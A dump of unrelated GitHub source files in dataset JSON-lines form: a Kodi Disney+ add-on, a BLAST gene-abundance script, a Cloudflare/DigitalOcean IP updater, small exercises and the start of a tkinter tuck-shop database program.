row['field'] == field and source == row['sourceEntity']:\n if not row['content']:\n continue\n\n if row['type'] not in _types:\n _types.append(row['type'])\n\n candidates.append((_types.index(row['type']), row['content']))\n\n if not candidates:\n return None\n\n return sorted(candidates, key=lambda x: x[0])[0][1]\n\n@plugin.route()\ndef series(series_id, **kwargs):\n data = api.series_bundle(series_id, page_size=0)\n\n title = _get_text(data['series']['texts'], 'title', 'series')\n folder = plugin.Folder(title, fanart=_image(data['series']['images'], 'fanart'))\n\n for row in data['seasons']['seasons']:\n item = _parse_season(row, data['series'])\n folder.add_items(item)\n\n if data['extras']['videos']:\n folder.add_item(\n label = (_.EXTRAS),\n art = {'thumb': _image(data['series']['images'], 'thumb')},\n path = plugin.url_for(extras, family_id=data['series']['family']['encodedFamilyId'], fanart=_image(data['series']['images'], 'fanart')),\n )\n\n if data['related']['items']:\n folder.add_item(\n label = _.SUGGESTED,\n art = {'thumb': _image(data['series']['images'], 'thumb')},\n path = plugin.url_for(suggested, series_id=series_id),\n )\n\n return folder\n\n@plugin.route()\ndef season(season_id, title, page=1, **kwargs):\n page = int(page)\n data = api.episodes([season_id,], page=page)\n\n folder = plugin.Folder(title, sort_methods=[xbmcplugin.SORT_METHOD_EPISODE, xbmcplugin.SORT_METHOD_UNSORTED, xbmcplugin.SORT_METHOD_LABEL, xbmcplugin.SORT_METHOD_DATEADDED])\n\n items = _process_rows(data['videos'], content_class='episode')\n folder.add_items(items)\n\n if ((data['meta']['episode_page_size'] * data['meta']['episode_page']) < data['meta']['max_hits_per_season']):\n folder.add_item(\n label = _(_.NEXT_PAGE, page=page+1),\n path = plugin.url_for(season, season_id=season_id, title=title, page=page+1),\n specialsort = 'bottom',\n )\n\n return folder\n\n@plugin.route()\ndef suggested(family_id=None, series_id=None, **kwargs):\n if family_id:\n data = api.video_bundle(family_id)\n elif series_id:\n data = api.series_bundle(series_id, page_size=0)\n\n folder = plugin.Folder(_.SUGGESTED)\n\n items = _process_rows(data['related']['items'])\n folder.add_items(items)\n\n return folder\n\n@plugin.route()\ndef extras(family_id, fanart=None, **kwargs):\n folder = plugin.Folder(_.EXTRAS, fanart=fanart)\n data = api.extras(family_id)\n items = _process_rows(data['videos'])\n folder.add_items(items)\n return folder\n\n@plugin.route()\ndef search(query=None, page=1, **kwargs):\n page = int(page)\n\n if not query:\n query = gui.input(_.SEARCH, default=userdata.get('search', '')).strip()\n if not query:\n return\n\n userdata.set('search', query)\n\n folder = plugin.Folder(_(_.SEARCH_FOR, query=query))\n\n data = api.search(query, page=page)\n\n hits = [x['hit'] for x in data['hits']] if data['resultsType'] == 'real' else []\n items = _process_rows(hits)\n folder.add_items(items)\n\n if (data['meta']['page_size'] + data['meta']['offset']) < data['meta']['hits']:\n folder.add_item(\n label = _(_.NEXT_PAGE, page=page+1),\n path = plugin.url_for(search, query=query, page=page+1),\n specialsort = 'bottom',\n )\n\n return folder\n\n@plugin.route()\n@plugin.login_required()\ndef play(content_id=None, family_id=None, skip_intro=None, **kwargs):\n if KODI_VERSION > 18:\n ver_required = '2.6.0'\n else:\n ver_required = '2.4.5'\n\n ia = inputstream.Widevine(\n license_key = api.get_config()['services']['drm']['client']['endpoints']['widevineLicense']['href'],\n manifest_type = 'hls',\n mimetype = 'application/vnd.apple.mpegurl',\n )\n\n if not ia.check() or not inputstream.require_version(ver_required):\n gui.ok(_(_.IA_VER_ERROR, kodi_ver=KODI_VERSION, ver_required=ver_required))\n\n if family_id:\n data = api.video_bundle(family_id)\n if not data.get('video'):\n raise PluginError(_.NO_VIDEO_FOUND)\n\n video = data['video']\n else:\n data = api.videos(content_id)\n if not data.get('videos'):\n raise PluginError(_.NO_VIDEO_FOUND)\n\n video = data['videos'][0]\n\n playback_url = video['mediaMetadata']['playbackUrls'][0]['href']\n playback_data = api.playback_data(playback_url)\n media_stream = playback_data['stream']['complete']\n original_language = video.get('originalLanguage') or 'en'\n\n headers = api.session.headers\n ia.properties['original_audio_language'] = original_language\n\n ## Allow fullres worldwide ##\n media_stream = media_stream.replace('/mickey/ps01/', '/ps01/')\n ##############\n\n item = _parse_video(video)\n item.update(\n path = media_stream,\n inputstream = ia,\n headers = headers,\n use_proxy = True, #required for default languages\n proxy_data = {'default_language': original_language, 'original_language': original_language},\n )\n\n if kwargs[ROUTE_RESUME_TAG] and settings.getBool('disney_sync', False):\n continue_watching = api.continue_watching()\n item.resume_from = continue_watching.get(video['contentId'], 0)\n item.force_resume = True\n\n elif (int(skip_intro) if skip_intro is not None else settings.getBool('skip_intros', False)):\n item.resume_from = _get_milestone(video.get('milestones'), 'intro_end', default=0) / 1000\n\n item.play_next = {}\n\n if settings.getBool('skip_credits', False):\n next_start = _get_milestone(video.get('milestones'), 'up_next', default=0) / 1000\n item.play_next['time'] = next_start\n\n if video['programType'] == 'episode' and settings.getBool('play_next_episode', True):\n data = api.up_next(video['contentId'])\n for row in data.get('items', []):\n if row['type'] == 'DmcVideo' and row['programType'] == 'episode' and row['encodedSeriesId'] == video['encodedSeriesId']:\n item.play_next['next_file'] = _get_play_path(row['contentId'])\n break\n\n elif video['programType'] != 'episode' and settings.getBool('play_next_movie', False):\n data = api.up_next(video['contentId'])\n for row in data.get('items', []):\n if row['type'] == 'DmcVideo' and row['programType'] != 'episode':\n item.play_next['next_file'] = _get_play_path(row['contentId'])\n break\n\n if settings.getBool('wv_secure', False):\n item.inputstream.properties['license_flags'] = 'force_secure_decoder'\n\n if settings.getBool('disney_sync', False):\n telemetry = playback_data['tracking']['telemetry']\n item.callback = {\n 'type':'interval',\n 'interval': 20,\n 'callback': plugin.url_for(callback, media_id=telemetry['mediaId'], fguid=telemetry['fguid']),\n }\n\n return item\n\n@plugin.route()\n@plugin.no_error_gui()\ndef callback(media_id, fguid, _time, **kwargs):\n api.update_resume(media_id, fguid, int(_time))\n\ndef _get_milestone(milestones, key, default=None):\n if not milestones:\n return default\n\n for milestone in milestones:\n if milestone['milestoneType'] == key:\n return milestone['milestoneTime'][0]['startMillis']\n\n return default\n\n@plugin.route()\ndef logout(**kwargs):\n if not gui.yes_no(_.LOGOUT_YES_NO):\n return\n\n api.logout()\n userdata.delete('kid_lockdown')\n userdata.delete('avatar')\n userdata.delete('profile')\n userdata.delete('profile_id')\n gui.refresh()","repo_name":"paulofernandes314/arrownegra.github.io","sub_path":"slyguy.disney.plus/resources/lib/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":26351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34427404065","text":"import importlib\nimport os\nimport sys\n\nfrom absl import logging, flags\n\nfrom deepray.design_patterns import SingletonType\n\nFLAGS = flags.FLAGS\n\n\nclass InputMeta(metaclass=SingletonType):\n\n def __init__(self, conf_version=None):\n self.conf_version = conf_version if conf_version else FLAGS.input_meta_data_path\n self.conf = self.import_conf()\n\n def import_conf(self):\n project_path = os.path.abspath(os.curdir)\n conf_path = os.path.join(project_path, 'examples/Recommendation/CGC/conf')\n logging.info(conf_path)\n\n def file_name(file_dir, target):\n paths = []\n for root, dirs, files in os.walk(file_dir):\n basename = os.path.basename(root)\n if basename == target:\n paths.append(root)\n if len(paths) == 0:\n logging.info(f'Cannot find conf: {target}')\n sys.exit()\n elif len(paths) > 1:\n logging.info('Found more than one conf:')\n for path in paths:\n logging.info(' ', os.path.relpath(path, project_path))\n sys.exit()\n else:\n return paths[0]\n\n local_conf_path = file_name(conf_path, self.conf_version)\n conf_module = os.path.relpath(local_conf_path, project_path).replace(\"/\", \".\")\n conf = importlib.import_module(f'{conf_module}.params', '*')\n # import examples.Recommendation.CGC.conf.default_geek_predict.conf_geek_predict_mix_4_target_cgc_f2_1v8_weight_tfra_base_new.params as conf\n return conf\n","repo_name":"deepray-AI/deepray","sub_path":"deepray/utils/data/input_meta.py","file_name":"input_meta.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"21454661225","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThe read4 API is already defined for you.\n\n @param buf, a list of characters\n @return an integer\n def read4(buf):\n\n# Below is an example of how the read4 API can be called.\nfile = File(\"abcdefghijk\") # File is \"abcdefghijk\", initially file pointer (fp) points to 'a'\nbuf = [' '] * 4 # Create buffer with enough space to store characters\nread4(buf) # read4 returns 4. Now buf = ['a','b','c','d'], fp points to 'e'\nread4(buf) # read4 returns 4. Now buf = ['e','f','g','h'], fp points to 'i'\nread4(buf) # read4 returns 3. Now buf = ['i','j','k',...], fp points to end of file\n\"\"\"\n\n\nclass Solution(object):\n def __init__(self):\n self.queue = []\n\n def read(self, buf, n):\n \"\"\"\n Perf: Runtime: 16 ms, faster than 96.93% / Memory Usage: 11.9 MB, less than 6.43%\n :type buf: Destination buffer (List[str])\n :type n: Number of characters to read (int)\n :rtype: The number of actual characters read (int)\n \"\"\"\n count = 0\n while True:\n _buf = ['']*4\n read4(_buf)\n self.queue.extend(_buf)\n idx = min(len(self.queue), n-count)\n for i in range(idx):\n buf[count] = self.queue.pop(0)\n count += 1\n if idx == 0:\n break\n return count\n","repo_name":"jerrt2003/leetcode-in-python","sub_path":"Interview_Feedback/Facebook/4-6/158. Read N Characters Given Read4 II - Call multiple times/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30471778002","text":"import pandas as pd\nimport numpy as np\nimport argparse\nimport sys\nimport re\nimport os\n\ndef parse_blast_output(blast_filepath, gene_group_type):\n mult = 3. if gene_group_type == 'prot' else 1.\n blast_output_columns = ['qseqid', 'qlen', 'bgi_id', 'slen',\n 'pident', 'length', 'mismatch', 'gapopen',\n 'qstart', 'qend', 'sstart', 'send',\n 'evalue', 'bitscore']\n\n blast_result = pd.read_csv(blast_filepath,\n names = blast_output_columns,\n sep='\\t', header=None\n )\n blast_result = blast_result[(blast_result.pident > 80) &\n (blast_result.length * mult / blast_result.slen > 0.8) &\n (blast_result.length * 1. / blast_result.qlen > 0.8) &\n (blast_result.evalue < 1e-5)]\n return blast_result\n\ndef parse_coverage_files(sample_group_folder, group_name, bgi_names):\n samples_names = [name for name in os.listdir(sample_group_folder) if name.endswith('bp_cov.txt')]\n samples_names = [name[:-11] for name in samples_names]\n for sample_name in samples_names:\n sample_coverage_filepath = os.path.join(sample_group_folder, '%s.bp_cov.txt' % sample_name)\n sample_bgi_coverage = pd.read_csv(sample_coverage_filepath,\n sep='\\t', header=None, names=['bp_cov']\n )\n sample_bgi_coverage['sum_bp_cov'] = sum(sample_bgi_coverage['bp_cov'])\n sample_bgi_coverage['sample'] = sample_name\n sample_bgi_coverage['bgi_id'] = bgi_names\n sample_bgi_coverage['group_name'] = group_name\n yield sample_bgi_coverage\n\ndef create_coverage_file(blast_result_path, bgi_coverage_path, gene_group_name, output_folder, input_type, mg_groups):\n bgi_names_path = os.path.join('metadata', 'BGIGeneSet2010_genes.txt')\n bgi_names = pd.read_csv(bgi_names_path, sep='\\t', header=None, names=['bgi_id'])\n\n blast_result = parse_blast_output(\n blast_filepath=blast_result_path,\n gene_group_type=input_type\n )\n\n headers = ['qseqid', 'sample', 'group_name', 'abund']\n gene_group_abund_path = os.path.join(output_folder, '{}.tsv'.format(gene_group_name))\n with open(gene_group_abund_path, 'w') as f:\n f.write('\\t'.join(headers) + '\\n')\n\n for group_name in mg_groups:\n coverage_files = parse_coverage_files(\n sample_group_folder=os.path.join(bgi_coverage_path, group_name),\n group_name=group_name,\n bgi_names=bgi_names\n )\n\n for sample_bgi_coverage in coverage_files:\n coverage = pd.merge(blast_result, sample_bgi_coverage, on='bgi_id')\n coverage['abund'] = coverage['bp_cov'] / coverage['slen'] / coverage['sum_bp_cov']\n coverage = coverage.loc[:, ['qseqid', 'sample', 'group_name', 'abund']]\n coverage = coverage.groupby(['qseqid', 'sample', 'group_name']).sum()\n coverage.reset_index(inplace=True)\n coverage.to_csv(gene_group_abund_path,\n sep='\\t', mode='a',\n header=False, index=False)\n\ndef blast(input_file, input_type, gene_group_name, n_threads, config_pathes, blastdb_path):\n if not os.path.isfile(input_file):\n sys.stdout.write('Error: file {} doesn\\'t exist\\n'.format(input_file))\n sys.exit()\n\n if (input_type == 'prot'):\n blast_type = config_pathes['tblastn_path']\n elif (input_type == 'nucl'):\n blast_type = config_pathes['blastn_path']\n else:\n sys.stdout.write('Error: incorrect input type: {}\\n'.format(input_type))\n sys.exit()\n\n blast_result_path = os.path.join('blast_results', 'BLAST_result_{}.txt'.format(gene_group_name))\n outfmt = '\\'6 qseqid qlen sseqid slen pident length mismatch gapopen qstart qend sstart send evalue bitscore\\''\n cmd = '{blast_type} -num_threads {n_threads} -db {blastdb_path} -query {input_file} -out {blast_result_path} -evalue 1e-5 -outfmt {outfmt}'.format(\n blast_type=blast_type,\n n_threads=n_threads,\n blastdb_path=blastdb_path,\n input_file=input_file,\n blast_result_path=blast_result_path,\n outfmt=outfmt\n )\n os.system(cmd)\n\n return blast_result_path\n\ndef parse_arguments():\n available_groups = set(os.listdir('BGI_coverage'))\n parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument('input_file', type=str,\n help='path to input fasta file')\n parser.add_argument('input_type', type=str,\n help='type of fasta file (prot/nucl)')\n parser.add_argument('-o', '--output-folder', type=str, default='.',\n help='path to output folder (default: current dir)')\n parser.add_argument('-n', '--n-threads', type=int,\n help='number of BLAST threads (default: 1)', default=1)\n mg_help = ['select groups of metagenomes',\n 'available: {}'.format(', '.join('\\'{}\\''.format(group_name) for group_name in available_groups)),\n 'default: all']\n parser.add_argument('-mg', '--metagen-group', nargs='+',\n default=available_groups,\n help='\\n'.join(mg_help))\n args = vars(parser.parse_args())\n\n if not os.path.exists(args['input_file']):\n raise Exception('Input file doesn\\'t exist')\n\n if not os.path.exists(args['output_folder']) or not os.path.isdir(args['output_folder']):\n raise Exception('Output file folder doesn\\'t exist')\n\n if args['input_type'] not in {'prot', 'nucl'}:\n raise Exception('Invalid input type: {}'.format(args['input_type']))\n\n if args['n_threads'] <= 0:\n raise Exception('Invalid number of threads: {}'.format(args['n_threads']))\n\n wrong_groups = [group_name for group_name in args['metagen_group'] if group_name not in available_groups]\n if wrong_groups:\n raise Exception('Invalid groups of metagenomes: {}'.format(', '.join(wrong_groups)))\n\n return args\n\nif __name__ == '__main__':\n args = parse_arguments()\n mg_groups = args['metagen_group']\n input_type = args['input_type']\n input_file = args['input_file']\n output_folder = args['output_folder']\n n_threads = args['n_threads']\n\n gene_group_name = os.path.splitext(os.path.basename(input_file))[0]\n\n blastdb_path = os.path.join('BGI_blastdb', 'BGIGeneSet2010')\n bgi_coverage_path = 'BGI_coverage'\n\n with open('config.json') as f:\n config_pathes = eval(''.join(f.readlines()))\n\n sys.stdout.write('Running BLAST ... \\n')\n blast_result_path = blast(\n input_file=input_file,\n input_type=input_type,\n gene_group_name=gene_group_name,\n n_threads=n_threads,\n config_pathes=config_pathes,\n blastdb_path=blastdb_path\n )\n\n sys.stdout.write('Creating coverage file ... \\n')\n create_coverage_file(\n blast_result_path=blast_result_path,\n bgi_coverage_path=bgi_coverage_path,\n gene_group_name=gene_group_name,\n output_folder=output_folder,\n input_type=input_type,\n mg_groups=mg_groups\n )\n","repo_name":"kyarygin/Yarygin_2016","sub_path":"get_genes_abund.py","file_name":"get_genes_abund.py","file_ext":"py","file_size_in_byte":7159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72173194089","text":"from django import forms\nfrom .models import TimeRecords\nfrom django.core.validators import MinLengthValidator\nfrom django.forms.widgets import SelectDateWidget\n\n\nclass CreateTimeSheetForm(forms.ModelForm): \n \n emp_id = forms.IntegerField(widget=forms.HiddenInput(), initial=123) \n class Meta:\n model = TimeRecords\n fields = '__all__'\n exclude = ['ts_status']\n labels = {\n \"ts_desc\": \"Task Description\"\n }\n widgets = {\n 'ts_date': forms.TextInput(attrs={'readonly': True, 'class': \"form-control\"}),\n 'ts_effort' : forms.TextInput(attrs={'type':'number', 'class': \"form-control\"}),\n 'ts_desc' : forms.TextInput(attrs={'class': \"form-control\"})\n }\n\n\n","repo_name":"26-saurabhmaheshwari/SESS","sub_path":"sess_dev/timesheets/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2582056957","text":"m, n = map(int, input('Введите размеры матрицы MxN через пробел: ').split())\nmatrix = []\nfor i in range(m):\n matrix.append(list(map(int, input('Введите элементы строки матрицы по возрастанию через пробел: ').split())))\n print(matrix[i])\nx = int(input('Введите искомый элемент матрицы: '))\n\nflag = True\nfor i in range(m):\n if matrix[i][0] <= x <= matrix[i][-1]:\n for j in range(n):\n if matrix[i][j] == x:\n print(i + 1, j + 1)\n flag = False\n break\nif flag:\n print(-1, -1)","repo_name":"HeraldOfWar/algos","sub_path":"lab_11/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38197635483","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport scipy.fftpack\nfrom scipy.fftpack import fft\nfrom scipy.io.wavfile import read\n\n\ndef get_audio():\n root_directory = 'labelled_data/'\n audio = np.ndarray(500)\n labels = []\n for directory in os.listdir(root_directory):\n for filename in os.listdir(root_directory + directory):\n wav_filename = root_directory + directory + '/' + filename\n samplerate, data = read(wav_filename)\n\n t_n = 10\n N = 1000\n T = t_n / N\n f_s = 1/T\n\n frequencies = np.linspace(0.0, 1.0 / (2.0*T), N//2)\n fft_values = fft(data[:, 0])\n fft_values = 2.0/N * np.abs(fft_values[0:N//2]) \n print(audio)\n print(fft_values)\n np.append(audio, fft_values, axis=0)\n break\n\n if directory == 'crash':\n labels.append('crash')\n else:\n labels.append('not_crash')\n\n return data, np.array(labels)\n \n# def get_data:\n # data = []\n # labels = []\n # for \n # wav_fname = 'crash2/1.wav'\n # samplerate, data = read(wav_fname)\n # length = data.shape[0] / samplerate\n # time = np.linspace(0., length, data.shape[0])\n # # plt.plot(time, data)\n # plt.plot(time, data[:, 0], label='Left Channel') \n # # plt.plot(time, data[:, 1], label='Right Channel')\n # plt.legend()\n # plt.xlabel('Time')\n # plt.ylabel('Amplitude')\n # plt.title('audio')\n # plt.show()\n\n # t_n = 10\n # N = 1000\n # T = t_n / N\n # f_s = 1/T\n\n # frequencies = np.linspace(0.0, 1.0/(2.0*T), N//2)\n # fft_values = fft(data[:, 0])\n # fft_values = 2.0/N * np.abs(fft_values_[0:N//2])\n\n # plt.plot(frequencies, fft_values)\n # plt.xlabel('Frequency [Hz]')\n # plt.ylabel('Amplitude')\n # plt.title(\"audio after fourier transform\")\n # plt.show()\n","repo_name":"Aarish-A/RoadSense","sub_path":"audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6616094046","text":"import requests, json\n\n# CloudFlare Config\napi_key = '-----'\napi_email = '-----'\napi_zone = '-----'\napi_dns = '-----'\nsub_domain = '-----'\n\n# DigitalOcean Config\nFWID = '-----'\nFWDroplets = ['-----','-----','-----']\nFWName = '-----'\nAPIKey = '-----'\n\n# get the current external IP\nextip = requests.get('https://api.ipify.org/')\nextip = extip.content\nprint('[*] Your external IP is ' + extip + '.')\n\n# grab IPv4 list from cloudflare\nresponse = requests.get('https://www.cloudflare.com/ips-v4')\nif response.status_code == requests.codes.ok:\n list = response.content\n CFlist = [s.strip() for s in list.splitlines()]\n print('[+] Obtained an updated list of CloudFlare IPv4 ranges.')\nelse:\n print('[-] Failed to obtain CloudFlare IPv4 ranges.')\n raise SystemExit(0)\n\n# DigitalOcean FW data\nFWData = {\n \"name\": FWName,\n \"droplet_ids\": FWDroplets,\n \"inbound_rules\": [\n {\n \"ports\": \"22\",\n \"protocol\": \"tcp\",\n \"sources\": {\n \"addresses\": [ extip ]\n }\n },\n {\n \"ports\": \"80\",\n \"protocol\": \"tcp\",\n \"sources\": {\n \"addresses\": CFlist\n }\n },\n {\n \"ports\": \"443\",\n \"protocol\": \"tcp\",\n \"sources\": {\n \"addresses\": CFlist\n }\n }\n ],\n \"tags\": []\n }\n\n\n# set the current IP on DigitalOcean\nurl = 'https://api.digitalocean.com/v2/firewalls/' + FWID\nhead = {\n 'Authorization' : 'Bearer ' + APIKey,\n 'Content-Type' : 'application/json'\n }\nresponse = requests.put(url, json=FWData, headers=head)\nif response.status_code == requests.codes.ok:\n print('[+] External IP and CloudFlare IPv4 list updated on DigitalOcean.')\nelse:\n print('[-] Failed to update external IP and CloudFlare IPv4 list on DigitalOcean.')\n raise SystemExit(0)\n\n# set the current IP on CloudFlare\nurl = 'https://api.cloudflare.com/client/v4/zones/' + api_zone + '/dns_records/' + api_dns\ndata = {\n 'type' : 'A',\n 'name' : sub_domain,\n 'content' : extip,\n 'ttl' : 120,\n 'proxied' : False\n }\nhead = {\n 'X-Auth-Email' : api_email,\n 'X-Auth-Key' : api_key,\n 'Content-Type' : 'application/json'\n }\nresponse = requests.put(url, json=data, headers=head)\n\nif response.status_code == requests.codes.ok:\n print('[+] External IP updated on Cloudflare.')\nelse:\n print('[-] Failed to update external IP on Cloudflare.')\n","repo_name":"OneLogicalMyth/Random-Scripts","sub_path":"UpdateIPs.py","file_name":"UpdateIPs.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"53"} +{"seq_id":"74553994086","text":"from tkinter import *\nfrom tkinter import filedialog, ttk\nimport tkinter.messagebox\nimport math\nimport sqlite3\nfrom OLD import date_picker\nimport datetime\nfrom collections import OrderedDict\n\n# currently working on: data correction; ??\n\n__author__ = 'Daniel Samet'\n\n\nclass TuckProgram:\n\n def __init__(self):\n \"\"\"initialises the window and creates the top_bar for navigation and main_frame to be populated by the\n appropriate functions with the relevant page details\"\"\"\n\n root = Tk()\n root.config(bg='grey11')\n width, height = 1400, 760\n root.minsize(width, height)\n x = (root.winfo_screenwidth() / 2) - (width / 2)\n y = (root.winfo_screenheight() / 2.2) - (height / 2)\n root.geometry('%dx%d+%d+%d' % (width, height, x, y))\n Grid.rowconfigure(root, 0, weight=1)\n Grid.rowconfigure(root, 1, weight=1000)\n Grid.columnconfigure(root, 0, weight=1)\n\n top_bar = Frame(root, bg=\"blue2\")\n top_bar.grid(row=0, column=0, sticky=E + W)\n self.title_var = StringVar()\n self.back_btn = Button(top_bar, text=\"<--\", font=(\"Calibri\", \"24\", \"bold\"),\n command=lambda: self.main_menu())\n self.back_btn.grid(row=0, column=0, sticky=W, padx=20, pady=20, ipadx=30)\n self.title = Label(top_bar, textvariable=self.title_var, font=(\"Calibri\", \"24\", \"bold\"))\n self.title.grid(row=0, column=1, sticky=E+W, padx=20, pady=20, ipadx=30)\n self.home_btn = Button(top_bar, text=\"Home\", font=(\"Calibri\", \"24\", \"bold\"), command=lambda: self.main_menu())\n self.home_btn.grid(row=0, column=2, sticky=E, padx=20, pady=20, ipadx=10)\n Grid.rowconfigure(top_bar, 0, weight=1)\n Grid.columnconfigure(top_bar, 0, weight=1), Grid.columnconfigure(top_bar, 1, weight=5)\n Grid.columnconfigure(top_bar, 2, weight=1)\n\n self.main_frame = Frame(root, bg='grey10')\n self.main_frame.grid(row=1, column=0, sticky=N+E+S+W)\n self.main_menu()\n\n self.letters, self.numbers = 'abcdefghijklmnopqrstuvwxyz', '0123456789'\n\n self.delete = []\n self.page_items_height, self.page_items_width = 5, 3\n\n self.search = list()\n\n estyle = ttk.Style() # style is for the setting of date_picker entry bg\n estyle.element_create(\"plain.field\", \"from\", \"clam\")\n estyle.layout(\"EntryStyle.TEntry\",\n [('Entry.plain.field',\n {'children': [('Entry.background', {'children': [('Entry.padding',\n {'children': [('Entry.textarea',\n {'sticky': 'nswe'})],\n 'sticky': 'nswe'})],\n 'sticky': 'nswe'})],\n 'border': '2', 'sticky': 'nswe'})])\n estyle.configure(\"EntryStyle.TEntry\",\n fieldbackground=\"grey70\")\n\n # self.font_1, self.font_2, self.font_3 = (\"Calibri\", \"14\", \"bold\"), (\"Calibri\", \"14\", \"bold\"),\n # (\"Calibri\", \"14\", \"bold\")\n\n self.db_initialisation()\n\n root.mainloop()\n\n def db_opener(self, database_name, foreign_keys=True):\n connection = sqlite3.connect(database_name)\n cursor = connection.cursor()\n if foreign_keys:\n cursor.execute(\"PRAGMA foreign_keys = 1\")\n return connection, cursor\n\n def db_initialisation(self):\n connection, cursor = self.db_opener(\"tuck.db\")\n # cursor.execute(\"\"\"DROP TABLE employee;\"\"\")\n sql_command = list()\n sql_command.append(\n \"\"\"\n CREATE TABLE accounts (\n account_ID INTEGER PRIMARY KEY,\n first_name VARCHAR(20) NOT NULL,\n last_name VARCHAR(30) NOT NULL,\n budget INTEGER NOT NULL,\n notes VARCHAR(255),\n date_added DATE NOT NULL);\n \"\"\")\n sql_command.append(\n \"\"\"\n CREATE TABLE accounts_discounts (\n account_ID INTEGER,\n amount INTEGER NOT NULL,\n start_date DATE NOT NULL,\n end_date DATE NOT NULL,\n void INTEGER NOT NULL,\n FOREIGN KEY (account_ID) REFERENCES accounts(account_ID));\n \"\"\")\n sql_command.append(\n \"\"\"\n CREATE TABLE accounts_spending_limit (\n account_ID INTEGER,\n amount INTEGER NOT NULL,\n start_date DATE NOT NULL,\n end_date DATE NOT NULL,\n void INTEGER NOT NULL,\n FOREIGN KEY (account_ID) REFERENCES accounts(account_ID));\n \"\"\")\n sql_command.append(\n \"\"\"\n CREATE TABLE accounts_sub_zero_allowance (\n account_ID INTEGER,\n amount INTEGER NOT NULL,\n start_date DATE NOT NULL,\n end_date DATE NOT NULL,\n void INTEGER NOT NULL,\n FOREIGN KEY (account_ID) REFERENCES accounts(account_ID));\n \"\"\")\n sql_command.append(\n \"\"\"\n CREATE TABLE transactions (\n Transaction_ID INTEGER PRIMARY KEY,\n account_ID INTEGER NOT NULL,\n product_ID INTEGER NOT NULL,\n transaction_date DATE NOT NULL,\n void INTEGER NOT NULL,\n FOREIGN KEY (account_ID) REFERENCES accounts(account_ID),\n FOREIGN KEY (product_ID) REFERENCES accounts(product_ID));\n \"\"\")\n sql_command.append(\n \"\"\"\n CREATE TABLE products (\n product_ID INTEGER PRIMARY KEY,\n product_name VARCHAR(20) NOT NULL,\n cost_price INTEGER,\n selling_price INTEGER NOT NULL,\n quantity INTEGER,\n notes VARCHAR(255),\n date_added DATE NOT NULL);\n \"\"\")\n sql_command.append(\n \"\"\"\n CREATE TABLE products_discount (\n product_ID INTEGER,\n amount INTEGER NOT NULL,\n type VARCHAR(1) NOT NULL,\n start_date DATE NOT NULL,\n end_date DATE NOT NULL,\n void INTEGER NOT NULL,\n FOREIGN KEY (product_ID) REFERENCES accounts(product_ID));\n \"\"\")\n sql_command.append(\n \"\"\"\n CREATE TABLE products_offers (\n product_ID INTEGER,\n buy_x INTEGER NOT NULL,\n get_y INTEGER NOT NULL,\n z_off INTEGER NOT NULL,\n start_date DATE NOT NULL,\n end_date DATE NOT NULL,\n void INTEGER NOT NULL,\n FOREIGN KEY (product_ID) REFERENCES accounts(product_ID));\n \"\"\")\n sql_command.append(\n \"\"\"\n CREATE TABLE products_purchase_limit (\n product_ID INTEGER,\n amount INTEGER NOT NULL,\n start_date DATE NOT NULL,\n end_date DATE NOT NULL,\n void INTEGER NOT NULL,\n FOREIGN KEY (product_ID) REFERENCES accounts(product_ID));\n \"\"\")\n try:\n for command in sql_command:\n cursor.execute(command)\n connection.commit()\n except sqlite3.OperationalError: # tables already exist (no need to worry abt one existing and not another)\n pass\n connection.close()\n\n connection, cursor = self.db_opener(\"settings.db\", foreign_keys=False)\n sql_command = list()\n sql_command.append(\n \"\"\"\n CREATE TABLE settings (\n setting_ID INTEGER PRIMARY KEY,\n setting_name VARCHAR(20),\n setting_val VARCHAR(20));\n \"\"\")\n try:\n for command in sql_command:\n cursor.execute(command)\n connection.commit()\n except sqlite3.OperationalError: # tables already exist\n pass\n connection.close()\n\n def set_nav_btn_cmds(self, back_btn, home_btn=\"default\"):\n \"\"\"sets navigation bar buttons with the given paramters for commands\"\"\"\n\n self.back_btn.config(command=back_btn)\n self.home_btn.config(command=home_btn if home_btn != \"default\" else lambda: self.main_menu())\n\n def main_menu(self):\n \"\"\"populates the main_frame with the main menu consisting of 3 buttons: Setup, Shop and Data\"\"\"\n\n [widget.destroy() for widget in self.main_frame.winfo_children()] # reset main_frame\n\n self.set_nav_btn_cmds(lambda: NONE, \"\")\n\n Grid.rowconfigure(self.main_frame, 0, weight=1)\n [Grid.rowconfigure(self.main_frame, i, weight=0) for i in range(1, 6)] # reset row configuration\n Grid.columnconfigure(self.main_frame, 0, weight=1), Grid.columnconfigure(self.main_frame, 1, weight=1)\n Grid.columnconfigure(self.main_frame, 2, weight=1)\n\n self.title_var.set(\"Main Menu\")\n\n setup_btn = Button(self.main_frame, text=\"Setup\", font=(\"Calibri\", \"32\", \"bold\"), bg='grey60',\n command=lambda: self.setup())\n setup_btn.grid(row=0, column=0, ipadx=120, ipady=60)\n shop_btn = Button(self.main_frame, text=\"Shop\", font=(\"Calibri\", \"32\", \"bold\"), bg='grey60',\n command=lambda: self.shop())\n shop_btn.grid(row=0, column=1, ipadx=120, ipady=60)\n data_btn = Button(self.main_frame, text=\"Data\", font=(\"Calibri\", \"30\", \"bold\"), bg='grey60',\n command=lambda: self.data())\n data_btn.grid(row=0, column=2, 